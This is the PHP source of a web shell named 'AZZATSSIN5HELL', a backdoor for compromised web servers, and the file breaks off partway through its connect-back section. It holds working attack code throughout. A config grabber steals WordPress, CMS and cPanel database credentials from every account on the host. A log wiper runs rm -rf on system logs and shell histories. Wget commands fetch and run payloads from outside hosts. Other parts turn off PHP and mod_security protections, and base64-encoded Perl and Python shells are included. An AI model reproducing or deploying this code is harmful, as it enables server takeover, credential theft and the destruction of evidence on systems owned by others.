AZZATSSIN5HELL

<?php
ob_start();

@set_time_limit(0);
@error_reporting(0);


if ($_GET['azzatssins']== 'phpinfo')
{

echo @phpinfo();

exit;

}


echo '


<title>'.$_SERVER['HTTP_HOST'].' ~ AZZATSSIN5HELL</title>
<meta http-equiv="content=type"  content="text/html; charset=utf-8" />


<style type="text/css">
  html,body {
     margin-top: 5px ;
     padding: 0;
     outline: 0;
}


body {

    direction: ltr;
    background-color: #000000;
    background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;
    color: #CCCCCC;
    font-family: Tahoma, Arial, sans-serif;
    font-weight: bold;
    text-align: center ;
}

input,textarea,select{
font-weight: bold;
color: #FFFFFF;
dashed #ffffff;
border: 1px dotted #003300;
background-color: black;
padding: 3px
}

input:hover{
box-shadow:0px 0px 4px #009900;

}
.cont a

{


text-decoration: none;
color: #FFFFFF;


}
.hedr
{
font-size:32px;
color: #009900;
text-shadow: 0px 0px 4px #003300 ;


}


.td1{


    border: 1px dotted #022B04;
    padding: 8px;
    border-radius: 20px;
    text-shadow: 0px 0px 2px #003300;
    font-size: 10px;
    font-family: Tahoma;
    font-weight: bold;

}

.td1 tr{}

.lol{
  text-align: left;
  float: left;
  background: #990000;
}
.nop{

width: 180px;
text-align: center;
font-size: 15px;
font-family:Tahoma;
color: #003300;


}
.nop a{
  text-decoration: none;
  color: #003300 ;
  text-shadow: none;
  width: 80px;
  padding: 8px


}
.nop a:hover{
  color: #FFFFFF;
 box-shadow: 0px 0px 4px #006600 ;


  }
a
{
text-decoration: none;
color: #006600;

}


.tmp tr td:hover{

box-shadow: 0px 0px 4px #EEEEEE;

}
.fot{

font-family:Tahoma, Arial, sans-serif;

  font-size: 13pt;
}

.ir {
  color: #FF0000;
}

.cont
{
float:right;
color: #FFFFFF;
box-shadow: 0px 0px 4px #003300;
font-size: 13px;
padding: 8px

}

.cont a{

 text-decoration: none;
 color: #FFFFFF;
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 13px;
 text-shadow: 0px 0px 3px ;
}

.cont a:hover{


  color: #FF0000 ;
  text-shadow:0px 0px 3px #FF0000 ;


}

.cont3
{
color: #FFFFFF;
font-size: 15px;
padding: 8px

}

.cont3 a{

 text-decoration: none;
 color: #FFFFFF;
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 15px;
 text-shadow: 0px 0px 3px ;
}

.cont3 a:hover{


  color: #FF0000 ;
  text-shadow:0px 0px 3px #FF0000 ;


}

.tmp tr td{

border: dotted 1px #003300;

padding: 4px ;
font-size: 14px;
}

.tmp tr td a {
  text-decoration: none;

}
.cmd
{

float:right;

}
 .tbm{
 font-size: 14px;
}

.tbm tr td{
 border: dashed 1px #111111;

}
.hr{

border: dotted 1px #003300;
padding: 5px ;
font-size: 13px;
color: white ;
text-shadow: 0px 0px 3px ;
}

.hr2{

border: dotted 1px #003300;
padding: 5px ;
font-size: 13px;
color: red ;
text-shadow: 0px 0px 3px ;
}

.t3p{
width: 100%;

}

.t3p{margin-left: 45px ;}

.t33p{margin-left: 45px ;}


.t3p tr td{

border:  solid 1px #002F00;
padding: 2px ;
font-size: 13px;
text-align: center ;
font-weight: bold;
margin-left: 20px ;

}
.t3p tr td:hover{

box-shadow: 0px 0px 4px #009900;

}


.info {margin-left: 100px ; }

.info tr td
{

border:  solid 1px #002F00;
padding: 5px ;
font-size: 13px;
text-align: center ;
font-weight: bold;


}
.conn{width: 70%;}

.conn tr td{
border: 1px dashed #003300;
padding: 5px ;
font-size: 13px;
text-align: center ;
font-weight: bold;

}


.lol a{

font-size: 10px;

}

.d0n{
width: 90%;
border-top:  solid 1px #003300;

}
.d0n tr td{
font-weight: bold;
color: #FFFFFF;
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 13px;
 margin-left: 110px ;


}
.site
{

font-weight: bold;
width: 50%;
box-shadow: 0px 0px 2px #003300;


}

.ab
{
box-shadow: 0px 0px 6px #444444;
width: 70%;
padding: 10px ;

}

.ab tr td
{
text-align: center ;
font-weight: bold;
 font-family: Tahoma, Arial, sans-serif  ;
  font-size: 13px;
 color: white;
  text-shadow: 0px 0px 2px white ;


}
.ab tr td b
{
color:red ;
text-shadow: 0px 0px 2px red ;
}
.ab tr td a
{
 color: white;
  text-shadow: 0px 0px 2px white ;

}
.ab tr td a:hover
{
color:#006600 ;
text-shadow: none ;
}

.bru
{
color: #FFFFFF;
font-family: Tahoma, Arial, sans-serif  ;
font-size: 14px;
text-shadow: 0px 0px 3px #000000 ;

}

.foter
{

color: #003300;
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 11px;
 text-shadow: 0px 0px 3px #000000 ;


}


</style>

';

echo '

<table width="95%" cellspacing="0" cellpadding="0" class="tb1" >

            <td width="15%" valign="top" rowspan="2">
            <div class="hedr"> <img src="http://azzat.wap.mu/files/1049320/AZZATSSINS.png" width="240px" height="320" align="left" alt="AZZATSSINS" > </div>
             </td>

        <td height="100" align="left" class="td1"   >

';

$pg = basename(__FILE__);

echo "OS : <b><font color=green>";
$safe_mode = @ini_get('safe_mode');
$dir = @getcwd();
$ip=$_SERVER['REMOTE_ADDR'];
$ips=$_SERVER['SERVER_ADDR'];
define('SWS','azzatssins');

if ($os)
{


}
else
{
  $os = @php_uname();
  echo $os ;
}
echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300;   ' target='_blank' href='http://www.google.com.sa/search?hl=ar&safe=active&client=firefox-a&hs=9Xx&rls=org.mozilla%3Aar%3Aofficial&q=$os&oq=$os&aq=f&aqi=&aql=&gs_sm=e&gs_upl=5759106l5781953l0l5782411l1l1l0l0l0l0l0l0ll0l0'>Google</a> ]";
echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300;   ' target='_blank' href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$os&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve='>exploit-db</a> ]";
echo "</font><br /></b>";

echo (($safe_mode)?("safe_mode &nbsp;: <b><font color=red>ON</font></b>"):("safe_mode: <b><font color=green>OFF</font></b>"));
echo "<br />disable_functions : ";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{


echo "<font color=red>$df</font></b>";

}

echo "<br />Server :&nbsp;<font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br>";

echo "PHP version : <b><font color=green>".@phpversion()."</font></b><br />";


echo "Id : <font color=green><b>"."user = ".@get_current_user()." | uid= ".@getmyuid()." | gid= ".@getmygid()."</font></b><br />";

echo "Pwd : <font color=green><b>".$dir."&nbsp;&nbsp;".wsoPermsColor($dir)."</font></b>&nbsp;&nbsp;[ <a href='$pg'>Home</a> ]<br /><br /><br />";


echo "Your ip :&nbsp;<font ><b><a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ip' target='_blank' >$ip &nbsp;&nbsp;</a></font></b>

 | ip server :&nbsp;<a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ips' target='_blank' >$ips</a></font></b>

| &nbsp;<a style='text-decoration: none; color: #FF0000;' href='$pg?azzatssins=site' target='_blank' >list site</a></font></b>
| &nbsp;<a style='text-decoration: none; color: #FF0000;' href='?azzatssins=phpinfo' target='_blank' >phpinfo</a></font></b> |";


 echo "
<br />


        </tr>
        </table>

<table cellspacing='0' cellpadding='0'  style=' margin:9px'>

    <tr>
            <td  rowspan='2' class='td1' valign='top' >


        <div class='nop'>

         <br /><a href='$pg' >File Manager</a> <br /> <br />
         <a href='$pg?azzatssins=grabber' >Config Grabber</a> <br /><br />
         <a href='$pg?azzatssins=sevuln' >Server Vuln</a> <br /><br />
         <a href='$pg?azzatssins=jump' >Jumping</a> <br /><br />
         <a href='$pg?azzatssins=mysql' >Mysql</a> <br /><br />
         <a href='$pg?azzatssins=symlinks' >Symlink</a> <br /><br />
         <a href='$pg?azzatssins=symlink' >Symlink1</a> <br /><br />
         <a href='$pg?azzatssins=sm' >Symlink2</a> <br /><br />
         <a href='$pg?azzatssins=whmcs' >WHMCS Decode</a> <br /><br />
         <a href='$pg?azzatssins=whmkill' >WHMCS Killer</a> <br /><br />
         <a href='$pg?azzatssins=con' >Connect Back</a> <br /><br />
         <a href='?azzatssins=bypass' >Bypass Functions</a> <br /><br />
         <a href='$pg?azzatssins=delog' >Hide Ur Ass</a> <br />


        </div>

    ";


echo '

<td  height="444" width="82%"  align="center" valign="top">

';


if(isset($_REQUEST['azzatssins']))
{

switch ($_REQUEST['azzatssins'])
{


////////////////////////////////////////////////// Symlink //////////////////////////////////////

case 'sm':

@mkdir('azx',0777);
$htcs = "Options Indexes FollowSymLinks\nDirectoryIndex 404.phtml\nAddType txt .php\nAddHandler txt .php";
$f =@fopen ('azx/.htaccess','w');
fwrite($f , $htcs);
@symlink("/","azx/root");

$pg = basename(__FILE__);
if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");

}
if(!$d00m)
{

die ("<meta http-equiv='refresh' content='0; url=http://azzatssinz.tumblr.com'/>");
}
else

{
echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

flush();

$site = $user['name'] ;

@symlink("/","azx/root");

$site = $domsws[1][0];

$ir = 'ir';

$il = 'il';

if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
{
$site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
}
echo "
<tr>
<td>
<div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
</td>
<td>
".$user['name']."
</td>
<td>
<a href='azx/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
</td>
</tr></div> ";

flush();
flush();

}
}
}
}
break;
/////// Symlinks 2  ///////
case 'symlinks':
@session_start();
@set_time_limit(0);
@ini_set('max_execution_time',0);
@mkdir('xazs',0777);
$sempak  = "Options all \n
DirectoryIndex azzatssins.html \n
AddType text/plain .php \n
AddHandler server-parsed .php \n
AddType text/plain .html \n
AddHandler txt .html \n
Require None \n
Satisfy Any";
$masuk =@fopen ('xazs/.htaccess','w');
fwrite($masuk ,$sempak);
@symlink('/','xazs/azzatssins.txt');
$pg = basename(__FILE__);


if(is_readable("/var/named")){
echo"<title>Symlink</title><body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>";
echo '<table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
<td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
<td align="center"> <font color="white"> <b>_USERS_</b></td>
<td align="center"> <font color="white"> <b>_SYMLINK_</b></center></td>';
$list = scandir("/var/named");
foreach($list as $domain){
if(strpos($domain,".db")){
@error_reporting(0);
@ini_set('log_errors',0);
@ini_set('error_log',NULL);

$i += 1;
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
echo "<tr>
<td><a class='azzatssins' href='http://".$domain." '>".$domain."</a></td>
<td align='center'><font color='white'>".$owner['name']."</td>
<td align='center'><a href='xazs/azzatssins.txt".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
}
}
flush();
flush();
}
echo "</tr></table></div></html>";

break;
///Log Erased///
case 'delog':
@error_reporting(0);
rmdir("/tmp/logs");
rmdir("/root/.ksh_history");
rmdir("/root/.bash_history");
rmdir("/root/.bash_logout");
rmdir("/usr/local/apache/logs");
rmdir("/usr/local/apache/log");
rmdir("/var/apache/logs");
rmdir("/var/apache/log");
rmdir("/var/run/utmp");
rmdir("/var/logs");
rmdir("/var/log");
rmdir("/var/adm");
rmdir("/etc/wtmp");
rmdir("/etc/utmp");
rmdir("$HISTFILE");
rmdir("/var/log/lastlog");
rmdir("/var/log/wtmp");system("clear");
exec("rm -rf /tmp/logs");
exec("rm -rf /root/.ksh_history");
exec("rm -rf /root/.bash_history");
exec("rm -rf /root/.bash_logout");
exec("rm -rf /usr/local/apache/logs");
exec("rm -rf /usr/local/apache/log");
exec("rm -rf /var/apache/logs");
exec("rm -rf /var/apache/log");
exec("rm -rf /var/run/utmp");
exec("rm -rf /var/logs");
exec("rm -rf /var/log");
exec("rm -rf /var/adm");
exec("rm -rf /etc/wtmp");
exec("rm -rf /etc/utmp");
exec("rm -rf $HISTFILE");
exec("rm -rf /var/log/lastlog");
exec("rm -rf /var/log/wtmp");
shell_exec("rm -rf /tmp/logs");
shell_exec("rm -rf /root/.ksh_history");
shell_exec("rm -rf /root/.bash_history");
shell_exec("rm -rf /root/.bash_logout");
shell_exec("rm -rf /usr/local/apache/logs");
shell_exec("rm -rf /usr/local/apache/log");
shell_exec("rm -rf /var/apache/logs");
shell_exec("rm -rf /var/apache/log");
shell_exec("rm -rf /var/run/utmp");
shell_exec("rm -rf /var/logs");
shell_exec("rm -rf /var/log");
shell_exec("rm -rf /var/adm");
shell_exec("rm -rf /etc/wtmp");
shell_exec("rm -rf /etc/utmp");
shell_exec("rm -rf $HISTFILE");
shell_exec("rm -rf /var/log/lastlog");
shell_exec("rm -rf /var/log/wtmp");
passthru("rm -rf /tmp/logs");
passthru("rm -rf /root/.ksh_history");
passthru("rm -rf /root/.bash_history");
passthru("rm -rf /root/.bash_logout");
passthru("rm -rf /usr/local/apache/logs");
passthru("rm -rf /usr/local/apache/log");
passthru("rm -rf /var/apache/logs");
passthru("rm -rf /var/apache/log");
passthru("rm -rf /var/run/utmp");
passthru("rm -rf /var/logs");
passthru("rm -rf /var/log");
passthru("rm -rf /var/adm");
passthru("rm -rf /etc/wtmp");
passthru("rm -rf /etc/utmp");
passthru("rm -rf $HISTFILE");
passthru("rm -rf /var/log/lastlog");
passthru("rm -rf /var/log/wtmp");
system("rm -rf /tmp/logs");
system("rm -rf /root/.bash_history");
system("rm -rf /root/.ksh_history");
system("rm -rf /root/.bash_logout");
system("rm -rf /usr/local/apache/logs");
system("rm -rf /usr/local/apache/log");
system("rm -rf /var/apache/logs");
system("rm -rf /var/apache/log");
system("rm -rf /var/run/utmp");
system("rm -rf /var/logs");
system("rm -rf /var/log");
system("rm -rf /var/adm");
system("rm -rf /etc/wtmp");
system("rm -rf /etc/utmp");
system("rm -rf $HISTFILE");
system("rm -rf /var/log/lastlog");
system("rm -rf /var/log/wtmp");
system("rm -rf cnf");system("rm -rf xazs"); system("rm -rf xyz"); system("rm -rf azx"); system("rm -rf sl");system("rm -rf jmp"); unlink('wd.php'); unlink('wk.php');

system('wget www.x-x-x.yn.lt/error.css'); system('mv error.css error.php');system('chmod 0400 error.php');
$fn=$_SERVER['SCRIPT_FILENAME'];unlink($fn); system("rm ".$fn);
echo'<meta http-equiv="Refresh" content= "0; url=?">';
break;
///Bypass Disable Functions And Safemode///
case 'bypass':
echo ini_get("safe_mode");
 echo ini_get("open_basedir");
 ini_restore("safe_mode");
 ini_restore("open_basedir"); $phi = fopen("php.ini","w+");
fwrite($phi,"safe_mode = Off
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF ");$phii = fopen(".htaccess","w+");
fwrite($phii,"<IfModule mod_security.c>
KillFilterEngine Off
KillFilterScanPOST Off
KillFilterCheckURLEncoding Off
KillFilterCheckUnicodeEncoding Off
</IfModule>
");
break;
////////Symlink With Python///////
case 'symlink':
system('wget http://x-x-x.yn.lt/py');system('mv py symlink.py');system('python symlink.py');system('rm symlink.py'); echo'<meta http-equiv="Refresh" content= "0; url=sl">';
break;
//////WHMCS DECODE//////
case 'whmcs':

system('wget http://wget.yu.tl/files/wd.css'); system('mv wd.css wd.php'); echo'<meta http-equiv="Refresh" content= "0; url=wd.php">';
break;
///////Mysql Connect//////////
case 'mysql':
system('wget http://wget.yu.tl/files/mysql.css'); system('mv mysql.css mysql.php'); echo'<meta http-equiv="Refresh" content= "0; url=mysql.php">';
break;
///////Config Grabber Cracker By AZZATSSINS/////

case 'whmkill':
system('wget http://wget.yu.tl/files/whmkill.zip'); system('mv whmkill.zip wk.php'); echo'<meta http-equiv="Refresh" content= "0; url=wk.php">';
break;
case 'grabber':
$usa = fopen('/etc/passwd','r');
mkdir('cnf', 0777);
$fd='cnf/';

while($us = fgets($usa)){
 if($us==""){

echo "<center><b><i><font color=red>Cant Read /etc/passwd</font></i></b></center>";

}
else{

preg_match_all('/(.*?):x:/', $us, $asura);

foreach($asura[1] as $user){
$lol = "/home/$user/public_html";
symlink($lol.'/wp-config.php',$fd.$user.'-WordPress.txt');
symlink($lol.'/configuration.php',$fd.$user.'-CMS.txt');
symlink($lol.'/wp/wp-config.php',$fd.$user.'-WordPress.txt');
symlink($lol.'/site/configuration.php',$fd.$user.'-CMS.txt');
symlink($lol.'/wordpress/wp-config.php',$fd.$user.'-WordPress.txt');
symlink($lol.'/whmcs/configuration.php',$fd.$user.'-CMS.txt');
symlink($lol.'/billing/configuration.php',$fd.$user.'-WordPress.txt');
symlink($lol.'/clients/configuration.php',$fd.$user.'-CMS.txt');
symlink($lol.'/blog/wp-config.php',$fd.$user.'-WordPress.txt');
symlink($lol.'/secure/configuration.php',$fd.$user.'-CMS.txt');
symlink($lol.'/config.php',$fd.$user.'-Other.txt');
symlink($lol.'/includes/config.php',$fd.$user.'-Other.txt');
copy('/home/'.$user.'/.my.cnf',$fd.$user.'-Cpanel.txt');
copy($lol.'/wp-config.php',$fd.$user.'-WordPress.txt');
copy($lol.'/configuration.php',$fd.$user.'-CMS.txt');
copy($lol.'/wp/wp-config.php',$fd.$user.'-WordPress.txt');
copy($lol.'/site/configuration.php',$fd.$user.'-CMS.txt');
copy($lol.'/wordpress/wp-config.php',$fd.$user.'-WordPress.txt');
copy($lol.'/whmcs/configuration.php',$fd.$user.'-CMS.txt');
copy($lol.'/billing/configuration.php',$fd.$user.'-WordPress.txt');
copy($lol.'/clients/configuration.php',$fd.$user.'-CMS.txt');
copy($lol.'/blog/wp-config.php',$fd.$user.'-WordPress.txt');
copy($lol.'/secure/configuration.php',$fd.$user.'-CMS.txt');
copy($lol.'/config.php',$fd.$user.'-Other.txt');
copy($lol.'/includes/config.php',$fd.$user.'-Other.txt');
file_get_contents($lol.'/wp-config.php',$fd.$user.'-WordPress.txt');
file_get_contents($lol.'/configuration.php',$fd.$user.'-CMS.txt');
file_get_contents($lol.'/config.php',$fd.$user.'-Other.txt');
}}}

echo'<meta http-equiv="Refresh" content= "0; url=cnf">';
break;
case 'sevuln':
if(is_readable("/etc/named.conf")){

echo '&raquo; /etc/named.conf is readable.<br />';

}else{

echo '&raquo; <font color="red">/etc/named.conf not readable</font> <br />';

}

if(is_readable("/etc/passwd")){

echo '&raquo; /etc/passwd is readable.<br />';

}else{

echo '&raquo; <font color="red">/etc/passwd not readable</font> <br />';

}

if(is_readable("/etc/valiases")){

echo '&raquo; /etc/valiases exists';

if(is_array(scandir("/etc/valiases"))){

echo ' & scanable';

}

echo '.<br />';

}else{

echo '&raquo; <font color="red">/etc/valiases not readable</font> <br />';

}

if(is_readable("/var/named")){

echo '&raquo; /var/named exists';

if(is_array(scandir("/var/named"))){

echo ' & scanable';

}

echo '.<br />';

}else{

echo '&raquo; <font color="red">/var/named not readable</font> <br />';

}

if(ini_get('disable_functions')){

echo '&raquo; '.ini_get('disable_functions').' are disabled<br />';

}

if(function_exists("symlink")){

echo '&raquo; Symlinking allowed<br />';

}else{

echo '&raquo; <font color="red">Symlinking not allowed</font> <br />';

}

if(is_writable("/var/tmp")){

echo '&raquo; /var/tmp folder is writable<br />';

}

if(is_readable('/var/log')){

echo '&raquo; /var/log folder is readable<br />';

}

die();
break;
case 'jump':
@error_reporting(0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
@ini_set('log_errors',0);
//$us = file_get_contents("/etc/passwd");
$usa = fopen('/etc/passwd','r');
$dir = mkdir('jmp', 0777);
$rrrr = "Options all \n DirectoryIndex jump \n Require None \n Satisfy Any";
$frr = fopen('jmp/.htaccess', 'w');
fwrite($frr, $rrrr);
while($us = fgets($usa)){
 if($us==""){
 echo "<font color=red>can't read /etc/passwd</font>";
 }
else{
 preg_match_all('/(.*?):x:/', $us, $user_byk);
 foreach($user_byk[1] as $user){
 $dir1 = "/home/$user/public_html/";
if(is_readable($dir1)){
 echo "<center><fieldset><b><i><font color='lime'>[FOUND] <a href='?dir=".$dir1."'>".$dir1."</a></i></b></fiedset></center><br>"; }
else{
    }
}
}

}
break;
/////////////////////////////////////////////////// Connect Back ////////////////////////////////////

case 'con':


if (!isset($_POST['con']))
{
echo "";

echo "
<div class='conn'><table cellpadding='0' align='center'>
<br />
<form method=\"post\">
<tr><td>
<br />Back Connect :<br /> <br />
Ip : <input type=\"text\" name=\"ip\" value='". $_SERVER['REMOTE_ADDR'] ."' />&nbsp;&nbsp;&nbsp;
Port : <input type=\"text\" name=\"port\" />&nbsp;&nbsp;&nbsp;
<select name=\"op\">
<option value=\"php\">PHP</option>
<option value=\"perl\">Perl</option>
<option value=\"python\">Python</option>
</select>&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"con\" value=\"Connect\" /><br /> <br /><br /></td></tr>
<tr><td><br />Bind Connect :<br /><br />Port : <input type=\"text\" name=\"bind_port\" /> <select name=\"op\">
<option value=\"perl\">Perl</option>
<option value=\"python\">Python</option>
</select>
<input type=\"submit\" name=\"con\" value=\"Connect bind\" /> <br /><br /> <br /></td></tr>


</form>";

exit;

}else
{

if ($_POST['con'] == 'Connect') {


$ip = $_POST['ip'] ;
$port = $_POST['port'] ;
$op = $_POST['op'] ;

$bind_perl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
$bind_py = "IyBTZXJ2ZXIgIA0KIA0KaW1wb3J0IHN5cyAgDQppbXBvcnQgc29ja2V0ICANCmltcG9ydCBvcyAgDQoNCmhvc3QgPSAnJzsgIA0KU0laRSA9IDUxMjsgIA0KDQp0cnkgOiAgDQogICAgIHBvcnQgPSBzeXMuYXJndlsxXTsgIA0KDQpleGNlcHQgOiAgDQogICAgIHBvcnQgPSAzMTMzNzsgIA0KIA0KdHJ5IDogIA0KICAgICBzb2NrZmQgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICwgc29ja2V0LlNPQ0tfU1RSRUFNKTsgIA0KDQpleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCg0KICAgICBwcmludCAiRXJyb3IgaW4gY3JlYXRpbmcgc29ja2V0IDogIixlIDsgIA0KICAgICBzeXMuZXhpdCgxKTsgICANCg0Kc29ja2ZkLnNldHNvY2tvcHQoc29ja2V0LlNPTF9TT0NLRVQgLCBzb2NrZXQuU09fUkVVU0VBRERSICwgMSk7ICANCg0KdHJ5IDogIA0KICAgICBzb2NrZmQuYmluZCgoaG9zdCxwb3J0KSk7ICANCg0KZXhjZXB0IHNvY2tldC5lcnJvciAsIGUgOiAgICAgICAgDQogICAgIHByaW50ICJFcnJvciBpbiBCaW5kaW5nIDogIixlOyANCiAgICAgc3lzLmV4aXQoMSk7ICANCiANCnByaW50KCJcblxuPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KcHJpbnQoIi0tLS0tLS0tIFNlcnZlciBMaXN0ZW5pbmcgb24gUG9ydCAlZCAtLS0tLS0tLS0tLS0tLSIgJSBwb3J0KTsgIA0KcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuXG4iKTsgDQogDQp0cnkgOiAgDQogICAgIHdoaWxlIDEgOiAjIGxpc3RlbiBmb3IgY29ubmVjdGlvbnMgIA0KICAgICAgICAgc29ja2ZkLmxpc3RlbigxKTsgIA0KICAgICAgICAgY2xpZW50c29jayAsIGNsaWVudGFkZHIgPSBzb2NrZmQuYWNjZXB0KCk7ICANCiAgICAgICAgIHByaW50KCJcblxuR290IENvbm5lY3Rpb24gZnJvbSAiICsgc3RyKGNsaWVudGFkZHIpKTsgIA0KICAgICAgICAgd2hpbGUgMSA6ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIGNtZCA9IGNsaWVudHNvY2sucmVjdihTSVpFKTsgIA0KICAgICAgICAgICAgIGV4Y2VwdCA6ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICBwaXBlID0gb3MucG9wZW4oY21kKTsgIA0KICAgICAgICAgICAgIHJhd091dHB1dCA9IHBpcGUucmVhZGxpbmVzKCk7ICANCiANCiAgICAgICAgICAgICBwcmludChjbWQpOyAgDQogICAgICAgICAgIA0KICAgICAgICAgICAgIGlmIGNtZCA9PSAnZzJnJzogIyBjbG9zZSB0aGUgY29ubmVjdGlvbiBhbmQgbW92ZSBvbiBmb3Igb3RoZXJzICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tLS0tLS0tLS0iKTsgIA0KICAgICAgICAgICAgICAgICBjbGllbnRzb2NrLnNodXRkb3duKCk7ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIG91dHB1dCA9ICIiOyAgDQogICAgICAgICAgICAgICAgICMgUGFyc2UgdGhlIG91dHB1dCBmcm9tIGxpc3QgdG8gc3RyaW5nICANCiAgICAgICAgICAgICAgICAgZm9yIGRhdGEgaW4gcmF3T3V0cHV0IDogIA0KICAgICAgICAgICAgICAgICAgICAgIG91dHB1dCA9IG91dHB1dCtkYXRhOyAgDQogICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgIGNsaWVudHNvY2suc2VuZCgiQ29tbWFuZCBPdXRwdXQgOi0gXG4iK291dHB1dCsiXHJcbiIpOyAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICBleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCiAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tIik7ICANCiAgICAgICAgICAgICAgICAgY2xpZW50c29jay5jbG9zZSgpOyAgDQogICAgICAgICAgICAgICAgIGJyZWFrOyAgDQpleGNlcHQgIEtleWJvYXJkSW50ZXJydXB0IDogIA0KIA0KDQogICAgIHByaW50KCJcblxuPj4+PiBTZXJ2ZXIgVGVybWluYXRlZCA8PDw8PFxuIik7ICANCiAgICAgcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KICAgICBwcmludCgiXHRUaGFua3MgZm9yIHVzaW5nIEFuaS1zaGVsbCdzIC0tIFNpbXBsZSAtLS0gQ01EIik7ICANCiAgICAgcHJpbnQoIlx0RW1haWwgOiBsaW9uYW5lZXNoQGdtYWlsLmNvbSIpOyAgDQogICAgIHByaW50KCI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iKTsNCg==";

